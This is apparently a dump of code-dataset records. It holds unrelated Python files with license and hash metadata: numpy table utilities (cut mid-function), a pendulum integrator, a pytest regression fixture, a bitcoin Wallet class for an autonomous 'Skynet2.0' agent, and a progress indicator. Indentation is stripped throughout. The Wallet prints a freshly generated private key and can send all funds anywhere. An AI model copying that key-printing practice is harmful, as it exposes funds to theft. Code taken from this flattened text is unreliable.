D = utils.fromarrays(Cols,type=np.ndarray,dtype=dtype)
coloring = {}
if Keep != None:
Trivials = set(Trivials).intersection(Keep)
for c in Trivials:
X.sort(order=[c])
cvals = np.array(utils.uniqify(X[c]))
[AA,BB] = fast.equalspairs(cvals,X[c])
for (i,cc) in enumerate(cvals):
blist = [str(bv).replace(' ', '') for bv in Bvals if bv in
X[b][AA[i]:BB[i]]]
coloring[str(cc)] = [a] + [bn + '_' + d for bn in blist for d
in NonTrivials]
for d in NonTrivials:
coloring[str(cc) + '_' + d] = [a] + blist
for c in NonTrivials:
coloring[c] = [a] + [bn + '_' + c for bn in bnames]
for bn in bnames:
coloring[prefix + bn] = [a] + [bn + '_' + c for c in NonTrivials]
return [D, coloring]
def addrecords(X, new):
"""
Append one or more records to the end of a numpy recarray or ndarray .
Can take a single record, void or tuple, or a list of records, voids or
tuples.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addrecords`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The array to add records to.
**new** : record, void or tuple, or list of them
Record(s) to add to `X`.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new records.
**See also:** :func:`tabular.spreadsheet.rowstack`
"""
if isinstance(new, np.record) or isinstance(new, np.void) or \
isinstance(new, tuple):
new = [new]
return np.append(X, utils.fromrecords(new, type=np.ndarray,
dtype=X.dtype), axis=0)
def addcols(X, cols, names=None):
"""
Add one or more columns to a numpy ndarray.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addcols`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The recarray to add columns to.
**cols** : numpy ndarray, or list of arrays of columns
Column(s) to add.
**names**: list of strings, optional
Names of the new columns. Only applicable when `cols` is a
list of arrays.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new columns.
**See also:** :func:`tabular.spreadsheet.colstack`
"""
if isinstance(names,str):
names = [n.strip() for n in names.split(',')]
if isinstance(cols, list):
if any([isinstance(x,np.ndarray) or isinstance(x,list) or \
isinstance(x,tuple) for x in cols]):
assert all([len(x) == len(X) for x in cols]), \
'Trying to add columns of wrong length.'
assert names != None and len(cols) == len(names), \
'Number of columns to add must equal number of new names.'
cols = utils.fromarrays(cols,type=np.ndarray,names = names)
else:
assert len(cols) == len(X), 'Trying to add column of wrong length.'
cols = utils.fromarrays([cols], type=np.ndarray,names=names)
else:
assert isinstance(cols, np.ndarray)
if cols.dtype.names == None:
cols = utils.fromarrays([cols],type=np.ndarray, names=names)
Replacements = [a for a in cols.dtype.names if a in X.dtype.names]
if len(Replacements) > 0:
print('Replacing columns',
[a for a in cols.dtype.names if a in X.dtype.names])
return utils.fromarrays(
[X[a] if a not in cols.dtype.names else cols[a] for a in X.dtype.names] +
[cols[a] for a in cols.dtype.names if a not in X.dtype.names],
type=np.ndarray,
names=list(X.dtype.names) + [a for a in cols.dtype.names
if a not in X.dtype.names])
def deletecols(X, cols):
"""
Delete columns from a numpy ndarry or recarray.
Can take a string giving a column name or comma-separated list of column
names, or a list of string column names.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.deletecols`.
**Parameters**
**X** : numpy recarray or ndarray with structured dtype
The numpy array from which to delete columns.
**cols** : string or list of strings
Name or list of names of columns in `X`. This can be
a string giving a column name or comma-separated list of
column names, or a list of string column names.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy ndarray with structured dtype
given by `X`, excluding the columns named in `cols`.
"""
if isinstance(cols, str):
cols = cols.split(',')
retain = [n for n in X.dtype.names if n not in cols]
if len(retain) > 0:
return X[retain]
else:
return None
def renamecol(X, old, new):
"""
Rename column of a numpy ndarray with structured dtype, in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.renamecol`.
**Parameters**
**X** : numpy ndarray with structured dtype
The numpy array for which a column is to be renamed.
**old** : string
Old column name, e.g. a name in `X.dtype.names`.
**new** : string
New column name to replace `old`.
"""
NewNames = tuple([n if n != old else new for n in X.dtype.names])
X.dtype.names = NewNames
def replace(X, old, new, strict=True, cols=None, rows=None):
"""
Replace value `old` with `new` everywhere it appears in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.replace`.
**Parameters**
**X** : numpy ndarray with structured dtype
Numpy array for which in-place replacement of `old` with
`new` is to be done.
**old** : string
**new** : string
**strict** : boolean, optional
* If `strict` = `True`, replace only exact occurences of `old`.
* If `strict` = `False`, assume `old` and `new` are strings and
replace all occurences of substrings (e.g. like
:func:`str.replace`)
**cols** : list of strings, optional
Names of columns to make replacements in; if `None`, make
replacements everywhere.
**rows** : list of booleans or integers, optional
Rows to make replacements in; if `None`, make replacements
everywhere.
Note: This function does in-place replacements. Thus there are issues
handling data types here when replacement dtype is larger than original
dtype. This can be resolved later by making a new array when necessary ...
"""
if cols == None:
cols = X.dtype.names
elif isinstance(cols, str):
cols = cols.split(',')
if rows == None:
rows = np.ones((len(X),), bool)
if strict:
new = np.array(new)
for a in cols:
if X.dtype[a] < new.dtype:
print('WARNING: dtype of column', a,
'is inferior to dtype of ', new,
'which may cause problems.')
try:
X[a][(X[a] == old)[rows]] = new
except:
print('Replacement not made on column', a, '.')
else:
for a in cols:
QuickRep = True
try:
colstr = ''.join(X[a][rows])
except TypeError:
print('Not replacing in column', a, 'due to type mismatch.')
else:
avoid = [ord(o) for o in utils.uniqify(old + new + colstr)]
ok = set(range(256)).difference(avoid)
if len(ok) > 0:
sep = chr(list(ok)[0])
else:
ok = set(range(65536)).difference(avoid)
if len(ok) > 0:
sep = unichr(list(ok)[0])
else:
print('All unicode characters represented in column',
a, ', can\t replace quickly.')
QuickRep = False
if QuickRep:
newrows = np.array(sep.join(X[a][rows])
.replace(old, new).split(sep))
else:
newrows = np.array([aa.replace(old,new) for aa in
X[a][rows]])
X[a][rows] = np.cast[X.dtype[a]](newrows)
if newrows.dtype > X.dtype[a]:
print('WARNING: dtype of column', a, 'is inferior to the '
'dtype of its replacement which may cause problems '
'(ends of strings might get chopped off).')
def rowstack(seq, mode='nulls', nullvals=None):
'''
Vertically stack a sequence of numpy ndarrays with structured dtype
Analog of numpy.vstack
Implemented by the tabarray method
:func:`tabular.tab.tabarray.rowstack` which uses
:func:`tabular.tabarray.tab_rowstack`.
**Parameters**
**seq** : sequence of numpy recarrays
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['nulls', 'commons', 'abort']
Denotes how to proceed if the recarrays have different
dtypes, e.g. different sets of named columns.
* if `mode` == ``nulls``, the resulting set of columns is
determined by the union of the dtypes of all recarrays
to be stacked, and missing data is filled with null
values as defined by
:func:`tabular.spreadsheet.nullvalue`; this is the
default mode.
* elif `mode` == ``commons``, the resulting set of
columns is determined by the intersection of the dtypes
of all recarrays to be stacked, e.g. common columns.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack have different dtypes.
**Returns**
**out** : numpy ndarray with structured dtype
Result of vertically stacking the arrays in `seq`.
**See also:** `numpy.vstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.vstack.html>`_.
'''
if nullvals == None:
nullvals = utils.DEFAULT_NULLVALUEFORMAT
#newseq = [ss for ss in seq if len(ss) > 0]
if len(seq) > 1:
assert mode in ['commons','nulls','abort'], \
('"mode" argument must either by "commons", "abort", or "nulls".')
if mode == 'abort':
if not all([set(l.dtype.names) == set(seq[0].dtype.names)
for l in seq]):
raise ValueError('Some column names are different.')
else:
mode = 'commons'
if mode == 'nulls':
names = utils.uniqify(utils.listunion([list(s.dtype.names)
for s in seq if s.dtype.names != None]))
formats = [max([s.dtype[att] for s in seq if s.dtype.names != None
and att in s.dtype.names]).str for att in names]
dtype = np.dtype(zip(names,formats))
return utils.fromarrays([utils.listunion([s[att].tolist()
if (s.dtype.names != None and att in s.dtype.names)
else [nullvals(format)] * len(s) for s in seq])
for (att, format) in zip(names, formats)], type=np.ndarray,
dtype=dtype)
elif mode == 'commons':
names = [x for x in seq[0].dtype.names
if all([x in l.dtype.names for l in seq[1:]])]
formats = [max([a.dtype[att] for a in seq]).str for att in names]
return utils.fromrecords(utils.listunion(
[ar.tolist() for ar in seq]), type=np.ndarray,
names=names, formats=formats)
else:
return seq[0]
def colstack(seq, mode='abort',returnnaming=False):
"""
Horizontally stack a sequence of numpy ndarrays with structured dtypes
Analog of numpy.hstack for recarrays.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.colstack` which uses
:func:`tabular.tabarray.tab_colstack`.
**Parameters**
**seq** : sequence of numpy ndarray with structured dtype
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['first','drop','abort','rename']
Denotes how to proceed if when multiple recarrays share the
same column name:
* if `mode` == ``first``, take the column from the first
recarray in `seq` containing the shared column name.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack share column names; this is the
default mode.
* elif `mode` == ``drop``, drop any column that shares
its name with any other column among the sequence of
recarrays.
* elif `mode` == ``rename``, for any set of all columns
sharing the same name, rename all columns by appending
an underscore, '_', followed by an integer, starting
with '0' and incrementing by 1 for each subsequent
column.
**Returns**
**out** : numpy ndarray with structured dtype
Result of horizontally stacking the arrays in `seq`.
**See also:** `numpy.hstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.hstack.html>`_.
"""
assert mode in ['first','drop','abort','rename'], \
'mode argument must take on value "first","drop", "rename", or "abort".'
AllNames = utils.uniqify(utils.listunion(
[list(l.dtype.names) for l in seq]))
NameList = [(x, [i for i in range(len(seq)) if x in seq[i].dtype.names])
for x in AllNames]
Commons = [x[0] for x in NameList if len(x[1]) > 1]
if len(Commons) > 0 or mode == 'first':
if mode == 'abort':
raise ValueError('There are common column names with differing ' +
'values in the columns')
elif mode == 'drop':
Names = [(L[0], x,x) for (x, L) in NameList if x not in Commons]
elif mode == 'rename':
NameDict = dict(NameList)
Names = utils.listunion([[(i,n,n) if len(NameDict[n]) == 1 else \
(i,n,n + '_' + str(i)) for n in s.dtype.names] \
for (i,s) in enumerate(seq)])
else:
Names = [(L[0], x,x) for (x, L) in NameList]
if returnnaming:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2]),Names
else:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2])
def join(L, keycols=None, nullvals=None, renamer=None,
returnrenaming=False, Names=None):
"""
Combine two or more numpy ndarray with structured dtype on common key
column(s).
Merge a list (or dictionary) of numpy ndarray with structured dtype, given
by `L`, on key columns listed in `keycols`.
This function is actually a wrapper for
:func:`tabular.spreadsheet.strictjoin`.
The ``strictjoin`` function has a few restrictions, and this ``join``
function will try to ensure that they are satisfied:
* each element of `keycol` must be a valid column name in `X`
and each array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
values in `A[col]` must be unique, -- and same for `X[col]`.
(Actually this uniqueness doesn't have to hold for the first tabarray
in L, that is, L[0], but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renamer** : function, optional
A function for renaming overlapping non-key column names
among the numpy recarrays to merge.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**returnrenaming** : Boolean, optional
Whether to return the result of the `renamer` function.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Names**: list of strings:
If `L` is a list, than names for elements of `L` can be
specified with `Names` (without losing the ordering as you
would if you did it with a dictionary).
`len(L)` must equal `len(Names)`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**renaming** : dictionary of dictionaries, optional
The result returned by the `renamer` function. Returned
only if `returnrenaming == True`.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**See Also:**
:func:`tabular.spreadsheet.strictjoin`
"""
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if not keycols:
keycols = utils.listintersection([a.dtype.names for a in LL])
if len(keycols) == 0:
raise ValueError('No common column names found.')
keycols = [l for l in keycols if all([a.dtype[l] == LL[0].dtype[l]
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with identical datatypes found.')
keycols = [l for l in keycols if all([isunique(a[keycols])
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with unique value sets in all arrays to be '
'merged, were found.')
else:
print('Inferring keycols to be:', keycols)
elif isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
renaming = {}
if len(commons) > 0:
print 'common attributes, forcing a renaming ...'
if renamer == None:
print('Using default renamer ...')
renamer = DEFAULT_RENAMER
renaming = renamer(L, Names=Names)
if not RenamingIsInCorrectFormat(renaming, L, Names=Names):
print('Renaming from specified renamer is not in correct format,'
'using default renamer instead ...')
renaming = DEFAULT_RENAMER(L, Names = Names)
NewNames = [[l if l not in renaming[k].keys() else renaming[k][l]
for l in ll.dtype.names] for (k, ll) in zip(Names, LL)]
if set(Commons(NewNames)).difference(keycols):
raise ValueError('Renaming convention failed to produce '
'separated names.')
Result = strictjoin(L, keycols, nullvals, renaming, Names=Names)
if returnrenaming:
return [Result, renaming]
else:
if renaming:
print('There was a nontrivial renaming, to get it set '
'"returnrenaming = True" in keyword to join function.')
return Result
def strictjoin(L, keycols, nullvals=None, renaming=None, Names=None):
"""
Combine two or more numpy ndarray with structured dtypes on common key
column(s).
Merge a list (or dictionary) of numpy arrays, given by `L`, on key
columns listed in `keycols`.
The ``strictjoin`` assumes the following restrictions:
* each element of `keycol` must be a valid column name in `X` and each
array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
values in `A[col]` must be unique, e.g. no repeats of values -- and
same for `X[col]`. (Actually, the uniqueness criterion need not hold
to the first tabarray in L, but first for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
For a wrapper that attempts to meet these restrictions, see
:func:`tabular.spreadsheet.join`.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renaming** : dictionary of dictionaries, optional
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
For example, the result returned by:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**See Also:**
:func:`tabular.spreadsheet.join`
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
assert all([set(keycols) <= set(l.dtype.names) for l in LL]), \
('keycols,', str(keycols),
', must be valid column names in all arrays being merged.')
assert all([isunique(l[keycols]) for l in LL[1:]]), \
('values in keycol columns,', str(keycols),
', must be unique in all arrays being merged.')
if renaming == None:
renaming = {}
assert RenamingIsInCorrectFormat(renaming, L, Names=Names), \
'renaming is not in proper format ... '
L = dict([(k,ll.copy()) for (k,ll) in zip(Names,LL)])
LL = L.values()
for i in Names:
l = L[i]
l.dtype = np.dtype(l.dtype.descr)
if i in renaming.keys():
for k in renaming[i].keys():
if k not in keycols:
renamecol(L[i], k, renaming[i][k])
l.sort(order = keycols)
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
assert len(commons) == 0, ('The following (non-keycol) column names '
'appear in more than on array being merged:', str(commons))
Result = colstack([(L[Names[0]][keycols])[0:0]] +
[deletecols(L[k][0:0], keycols) \
for k in Names if deletecols(L[k][0:0], keycols) != None])
PL = powerlist(Names)
ToGet = utils.listunion([[p for p in PL if len(p) == k]
for k in range(1, len(Names))]) + [PL[-1]]
for I in ToGet[::-1]:
Ref = L[I[0]][keycols]
for j in I[1:]:
if len(Ref) > 0:
Ref = Ref[fast.recarrayisin(Ref, L[j][keycols], weak=True)]
else:
break
if len(Ref) > 0:
D = [fast.recarrayisin(L[j][keycols], Ref, weak=True) for j in I]
Ref0 = L[I[0]][keycols][D[0]]
Reps0 = np.append(np.append([-1],
(Ref0[1:] != Ref0[:-1]).nonzero()[0]),[len(Ref0)-1])
Reps0 = Reps0[1:] - Reps0[:-1]
NewRows = colstack([Ref0] +
[deletecols(L[j][D[i]], keycols).repeat(Reps0) if i > 0 else
deletecols(L[j][D[i]], keycols) for (i, j) in enumerate(I)
if deletecols(L[j][D[i]], keycols) != None])
for (i,j) in enumerate(I):
L[j] = L[j][np.invert(D[i])]
Result = rowstack([Result, NewRows], mode='nulls',
nullvals=nullvals)
return Result
def RenamingIsInCorrectFormat(renaming, L, Names=None):
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
return isinstance(renaming, dict) and \
set(renaming.keys()) <= set(Names) and \
all([isinstance(renaming[k],dict) and
set(renaming[k].keys()) <=
set(LL[Names.index(k)].dtype.names) for k in renaming.keys()])
def DEFAULT_RENAMER(L, Names=None):
"""
Renames overlapping column names of numpy ndarrays with structured dtypes
Rename the columns by using a simple convention:
* If `L` is a list, it will append the number in the list to the key
associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the overlapping
columns from that array.
Default renamer function used by :func:`tabular.spreadsheet.join`
**Parameters**
**L** : list or dictionary
Numpy recarrays with columns to be renamed.
**Returns**
**D** : dictionary of dictionaries
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
commons = Commons([l.dtype.names for l in LL])
D = {}
for (i,l) in zip(Names, LL):
d = {}
for c in commons:
if c in l.dtype.names:
d[c] = c + '_' + str(i)
if d:
D[i] = d
return D
def Commons(ListOfLists):
commons = []
for i in range(len(ListOfLists)):
for j in range(i+1, len(ListOfLists)):
commons.extend([l for l in ListOfLists[i] if l in ListOfLists[j]])
return commons
def powerlist(S):
if len(S) > 0:
Sp = powerlist(S[:-1])
return Sp + [x + [S[-1]] for x in Sp]
else:
return [[]]
def isunique(col):
[D,s] = fast.recarrayuniqify(col)
return len(D.nonzero()[0]) == len(col)
|
mit
| -489,199,996,321,512,960
| 34.931533
| 92
| 0.546152
| false
| 4.103149
| false
| false
| false
|
KiMiralles/Python-Learning
|
Computational Physics Newman/Book Resources/bulirsch.py
|
1
|
1824
|
from math import sin,pi
from numpy import empty,array,arange
from pylab import plot,show
g = 9.81
l = 0.1
theta0 = 179*pi/180
a = 0.0
b = 10.0
N = 100 # Number of "big steps"
H = (b-a)/N # Size of "big steps"
delta = 1e-8 # Required position accuracy per unit time
def f(r):
theta = r[0]
omega = r[1]
ftheta = omega
fomega = -(g/l)*sin(theta)
return array([ftheta,fomega],float)
tpoints = arange(a,b,H)
thetapoints = []
r = array([theta0,0.0],float)
# Do the "big steps" of size H
for t in tpoints:
thetapoints.append(r[0])
# Do one modified midpoint step to get things started
n = 1
r1 = r + 0.5*H*f(r)
r2 = r + H*f(r1)
# The array R1 stores the first row of the
# extrapolation table, which contains only the single
# modified midpoint estimate of the solution at the
# end of the interval
R1 = empty([1,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*H*f(r2))
# Now increase n until the required accuracy is reached
error = 2*H*delta
while error>H*delta:
n += 1
h = H/n
# Modified midpoint method
r1 = r + 0.5*h*f(r)
r2 = r + h*f(r1)
for i in range(n-1):
r1 += h*f(r2)
r2 += h*f(r1)
# Calculate extrapolation estimates. Arrays R1 and R2
# hold the two most recent lines of the table
R2 = R1
R1 = empty([n,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*h*f(r2))
for m in range(1,n):
epsilon = (R1[m-1]-R2[m-1])/((n/(n-1))**(2*m)-1)
R1[m] = R1[m-1] + epsilon
error = abs(epsilon[0])
# Set r equal to the most accurate estimate we have,
# before moving on to the next big step
r = R1[n-1]
# Plot the results
plot(tpoints,thetapoints)
plot(tpoints,thetapoints,"b.")
show()
|
gpl-3.0
| 7,120,225,636,442,674,000
| 23.648649
| 62
| 0.565241
| false
| 2.784733
| false
| false
| false
|
ESSS/pytest-regressions
|
src/pytest_regressions/data_regression.py
|
1
|
3451
|
from functools import partial
import yaml
from pytest_regressions.common import Path, check_text_files, perform_regression_check
class DataRegressionFixture:
"""
Implementation of `data_regression` fixture.
"""
def __init__(self, datadir, original_datadir, request):
"""
:type datadir: Path
:type original_datadir: Path
:type request: FixtureRequest
"""
self.request = request
self.datadir = datadir
self.original_datadir = original_datadir
self.force_regen = False
def check(self, data_dict, basename=None, fullpath=None):
"""
Checks the given dict against a previously recorded version, or generate a new file.
:param dict data_dict: any yaml serializable dict.
:param str basename: basename of the file to test/record. If not given the name
of the test is used.
Use either `basename` or `fullpath`.
:param str fullpath: complete path to use as a reference file. This option
will ignore ``datadir`` fixture when reading *expected* files but will still use it to
write *obtained* files. Useful if a reference file is located in the session data dir for example.
``basename`` and ``fullpath`` are exclusive.
"""
__tracebackhide__ = True
def dump(filename):
"""Dump dict contents to the given filename"""
import yaml
dumped_str = yaml.dump_all(
[data_dict],
Dumper=RegressionYamlDumper,
default_flow_style=False,
allow_unicode=True,
indent=2,
encoding="utf-8",
)
with filename.open("wb") as f:
f.write(dumped_str)
perform_regression_check(
datadir=self.datadir,
original_datadir=self.original_datadir,
request=self.request,
check_fn=partial(check_text_files, encoding="UTF-8"),
dump_fn=dump,
extension=".yml",
basename=basename,
fullpath=fullpath,
force_regen=self.force_regen,
)
# non-PEP 8 alias used internally at ESSS
Check = check
class RegressionYamlDumper(yaml.SafeDumper):
"""
Custom YAML dumper aimed for regression testing. Differences to usual YAML dumper:
* Doesn't support aliases, as they produce confusing results on regression tests. The most
definitive way to get rid of YAML aliases in the dump is to create an specialization that
never allows aliases, as there isn't an argument that offers same guarantee
(see http://pyyaml.org/ticket/91).
"""
def ignore_aliases(self, data):
return True
@classmethod
def add_custom_yaml_representer(cls, data_type, representer_fn):
"""
Add custom representer to regression YAML dumper. It is polymorphic, so it works also for
subclasses of `data_type`.
:param type data_type: Type of objects.
:param callable representer_fn: Function that receives ``(dumper, data)`` type as
argument and must must return a YAML-convertible representation.
"""
# Use multi-representer instead of simple-representer because it supports polymorphism.
yaml.add_multi_representer(
data_type, multi_representer=representer_fn, Dumper=cls
)
|
mit
| 7,882,442,899,186,516,000
| 33.858586
| 110
| 0.622718
| false
| 4.487646
| false
| false
| false
|
Skynet2-0/Skynet2.0
|
agent/Wallet.py
|
1
|
4754
|
"""
Created on Apr 26, 2016
@author: niels
"""
from subprocess import PIPE, STDOUT
from BogusFormBuilder import BogusFormBuilder
import subprocess
import re
import os
import time
import sys
import pexpect
class Wallet(object):
"""
This class will manage the bitcoins going in and out off the agent.
"""
def __init__(self):
""" Constructor. """
output = pexpect.run('electrum listaddresses')
print(output)
pattern = re.compile(r'\[\W*"[A-z0-9]+"\W*\]') #the specific output for electrum if 1 adress exists
print(pattern.search(output))
if(pattern.search(output)):
#if a wallet exists, initialize that one
print('using already existing wallet')
else:
self._create_wallet()
subprocess.call(['electrum', 'daemon', 'start'])
def _answer_prompt(self, child, answer):
"""
Wait for a prompt, then send the answer. Answering with '' is the same as no answer
child -- a result from pexpect.spawn and is thus of the pexpect.spawn class.
"""
#wait for prompt, then send answer
child.waitnoecho()
child.sendline(answer)
try:
child.read()
except:
pass #somethimes no output is generated, and eof would cash read...
def _create_wallet(self):
print('did not find an existing wallet, creating a new one')
#ensure the daemon is stopped, as this causes path errors (mostly usefull for development)
pexpect.run('electrum daemon stop')
#build a new wallet if no wallet yet exists
walletpair=str(subprocess.check_output('python addrgen/addrgen.py',shell=True))
walletpair = re.split('\W+', walletpair)
self.address = walletpair[1]
self.privkey = walletpair[2]
print('created a wallet with address \''+self.address+'\' and privatekey \''+self.privkey+'\'')
child = pexpect.spawn('electrum', ['restore', self.privkey])
#respectively: use default password, use default fee (0.002), use default gap limit and give seed
self._answer_prompt(child, '')
#check if wallet was created succesfulyl
command = """electrum listaddresses"""
output = pexpect.run(command)
walletFinder = re.compile(r'\[\W*"([A-z0-9]+)"\W*\]')
result = walletFinder.search(output)
#This horrible feedback loop is here due to a quirk of electrum.
#Needs refactoring, but do not refactor without extensive testing (i.e. multiple vps all from clean install)
#Because electrum behaviour right after startup tends to differ from server to server (i suspect something to do wtih specs)
try:
print result.group(1)
return result.group(1)
except:
return self._create_wallet()
# def __del__(self):
# '''
# clear up the electrum service
# '''
# subprocess.call(['electrum', 'daemon', 'stop'])
def balance(self):
"""
Return the balance of the Btc wallet (i.e. confirmed balance+unconfirmed balance).
"""
balancesheet = str(subprocess.check_output(['electrum', 'getbalance']))
return self.calculateBalance(balancesheet)
def calculateBalance(self, balancesheet):
"""
Given the output of electrum getbalance
calculates the actual balance.
"""
confirmedBalance = re.search('"confirmed": "([0-9.\-]+)"', balancesheet)
unconfirmedBalance = re.search('"unconfirmed": "([0-9.\-]+)"', balancesheet)
sum = 0.0
if confirmedBalance:
sum+=float(confirmedBalance.group(1))
if unconfirmedBalance:
sum+=float(unconfirmedBalance.group(1))
return sum
def canPay(self, amount, fee):
return float(amount)+float(fee)<=self.balance()
def payToAutomatically(self, address, amount):
"""
Make a payment using an automatically calculated fee.
address -- The address to transfer to.
amount -- The amount to transfer.
"""
if self.canPay(amount,'0.0'):
payment = str(subprocess.check_output(['electrum', 'payto', address, amount]))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
return True
return False
def send_everything_to(self, address):
"""
Transfers all available funds in the wallet to the specified address
address -- The address as string to transfer to
"""
payment = str(subprocess.check_output(['electrum', 'payto', str(address), '!']))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
def payTo(self, address, fee, amount):
"""
If funds allow, transfer amount in Btc to Address. With a fee for
processor.
address -- The address to pay to.
fee -- The fee to pay.
amount -- The amount to transfer.
"""
if self.canPay(amount, fee):
print(str(subprocess.call(['electrum', 'payto', '-f', fee, address, amount])))
|
gpl-3.0
| 8,826,590,145,078,224,000
| 30.071895
| 126
| 0.689314
| false
| 3.371631
| false
| false
| false
|
hkkwok/MachOTool
|
utils/progress_indicator.py
|
1
|
1267
|
import sys
import datetime
class ProgressIndicator(object):
ENABLED = True
RECORDS = list()
def __init__(self, prompt, frequency):
self._display(prompt)
self._record(prompt + 'start')
self.prompt = prompt
self.frequency = frequency
self.count = 0
def click(self):
if (self.count % self.frequency) == 0:
self._display('.')
self.count += 1
def done(self):
self._display('\n')
self._record(self.prompt + 'done (%d entries)' % self.count)
@classmethod
def display(cls, fmt, *args):
if cls.ENABLED:
if len(args) == 0:
output = fmt
else:
output = fmt % tuple(args)
cls._display(output)
cls._record(output)
@classmethod
def _display(cls, output):
if cls.ENABLED:
sys.stdout.write(output)
sys.stdout.flush()
@classmethod
def _record(cls, event):
cls.RECORDS.append((datetime.datetime.now(), event))
@classmethod
def clear(cls):
cls.RECORDS = list()
@classmethod
def dump_records(cls):
for (timestamp, event) in cls.RECORDS:
print '%s: %s' % (str(timestamp), event)
|
apache-2.0
| 1,150,852,479,338,861,800
| 23.365385
| 68
| 0.539069
| false
| 3.996845
| false
| false
| false
|
